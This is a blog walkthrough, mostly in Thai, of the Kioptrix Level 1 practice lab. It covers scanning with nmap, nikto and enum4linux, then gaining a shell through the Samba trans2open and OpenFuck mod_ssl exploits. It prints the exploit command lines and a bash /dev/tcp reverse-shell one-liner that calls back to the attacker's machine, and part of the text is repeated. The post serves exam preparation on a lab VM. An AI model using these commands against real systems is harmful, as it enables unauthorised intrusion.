This lab is one of Kioptrix series that I learned before take OSCP exam on 2015. For this post I write with only Thai language. However you can simply understand my step from pictures.
post วันนี้เอา lab สมัยตอนเตรียมตัวสอบ oscp มา walkthrough ย้อนหลังอีก 1 lab ชื่อ Kioptrix level 1 ครับ เขียนรีวิวไว้ตั้งแต่สอบเสร็จปี 2015 เช่นกัน ช่วงนี้เอาเรื่องเก่าๆมาทบทวน พบว่าลืมไปเยอะเหมือนกัน มีกระบี่ต้องคอยลับคมนะครับ มาเริ่มกันเลยดีกว่า
ผมทำ lab นี้โดย run ตัวเป้าหมายบน VM นะครับ
1. ก่อนอื่นก็เลยต้องใช้ net discover เพื่อค้นหาในวง subnet ของเราว่าเป้าหมายเป็น ip อะไร
# netdiscover -r 192.168.xx.0/24
2. รัน nmap เพื่อหา service ที่น่าสนใจ
# nmap -p1-65535 -sS -sV -A 192.168.xx.20
3. พบ port 80 ลองใช้ nikto ทำการ scan พบบางอย่างน่าสนใจ ตามภาพ
เราจะทำ exploit จากข้อมูลที่ได้ในขั้นตอน recon กับ discover
วิธีการที่ 1
จากผลของ nmap พบว่าเป็น linux 2.4.9 ซึ่งค่อนข้างเก่า และมีการใช้ samba ด้วย ดังนั้นเราจะลองใช้ tools ชื่อ enum4linux ซึ่งมีใน kali อยู่แล้ว scan ได้ผลดังภาพ
วิธีการที่ 2
วิธีนี้ไปเห็นของคนอื่นใน internet เลยมาทำต่อ คือจากผลของ nikto ที่ scan เจอเรื่อง mod_ssl ด้านบน เราเอาไป search ใน google เจาอันนี้เลย OpenFuck
# ./openfuck 0x6b 192.168.99.20 443
ผลที่ได้ got a shell
post วันนี้เอา lab สมัยตอนเตรียมตัวสอบ oscp มา walkthrough ย้อนหลังอีก 1 lab ชื่อ Kioptrix level 1 ครับ เขียนรีวิวไว้ตั้งแต่สอบเสร็จปี 2015 เช่นกัน ช่วงนี้เอาเรื่องเก่าๆมาทบทวน พบว่าลืมไปเยอะเหมือนกัน มีกระบี่ต้องคอยลับคมนะครับ มาเริ่มกันเลยดีกว่า
ผมทำ lab นี้โดย run ตัวเป้าหมายบน VM นะครับ
1. ก่อนอื่นก็เลยต้องใช้ net discover เพื่อค้นหาในวง subnet ของเราว่าเป้าหมายเป็น ip อะไร
# netdiscover -r 192.168.xx.0/24
2. รัน nmap เพื่อหา service ที่น่าสนใจ
# nmap -p1-65535 -sS -sV -A 192.168.xx.20
3. พบ port 80 ลองใช้ nikto ทำการ scan พบบางอย่างน่าสนใจ ตามภาพ
เราจะทำ exploit จากข้อมูลที่ได้ในขั้นตอน recon กับ discover
วิธีการที่ 1
จากผลของ nmap พบว่าเป็น linux 2.4.9 ซึ่งค่อนข้างเก่า และมีการใช้ samba ด้วย ดังนั้นเราจะลองใช้ tools ชื่อ enum4linux ซึ่งมีใน kali อยู่แล้ว scan ได้ผลดังภาพ
พบ samba version 2.2.1a ซึ่งมีช่องโหว่ trans2open ตามภาพจากใน exploit-db
ก็จัดเลย โดยผมจะใช้ metasploit แทนการใช้ script เพราะมีมาให้อยู่แล้ว และจากที่ไปดูของคนอื่นที่ทำรีวิว ปรากฏว่าเขาใช้อีกช่องโหว่นึงด้วย ผมก็จะไปอันนี้เร็วๆ จะได้เขียนอีกอันนึง
ได้เป็น limited shell ซึ่งถ้าอยากได้ interactive shell ก็ไม่ยากใช้สูตรเดิม
bash -i >& /dev/tcp/192.168.xx.16/4444 0>&1 (โดยใส่ ip เครื่องเราลงไป)
วิธีการที่ 2
วิธีนี้ไปเห็นของคนอื่นใน internet เลยมาทำต่อ คือจากผลของ nikto ที่ scan เจอเรื่อง mod_ssl ด้านบน เราเอาไป search ใน google เจาอันนี้เลย OpenFuck
ซึ่งใน kali ของเราก็มีอยู่แล้ว ลอง search ดู
ซึ่งจากข้อมูลใน exploit-db จะบอกให้เราทำการ modify code ตาม
http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
ผม copy มาให้ตามนี้ครับ
แล้วพอลอง run ดูจะมีให้เลือก version ของ apache เป้าหมาย ก็เลือกตามภาพ
ลองรัน code ที่เราทำการ compile เสร็จแล้วเพื่อโจมตี
Comments
Post a Comment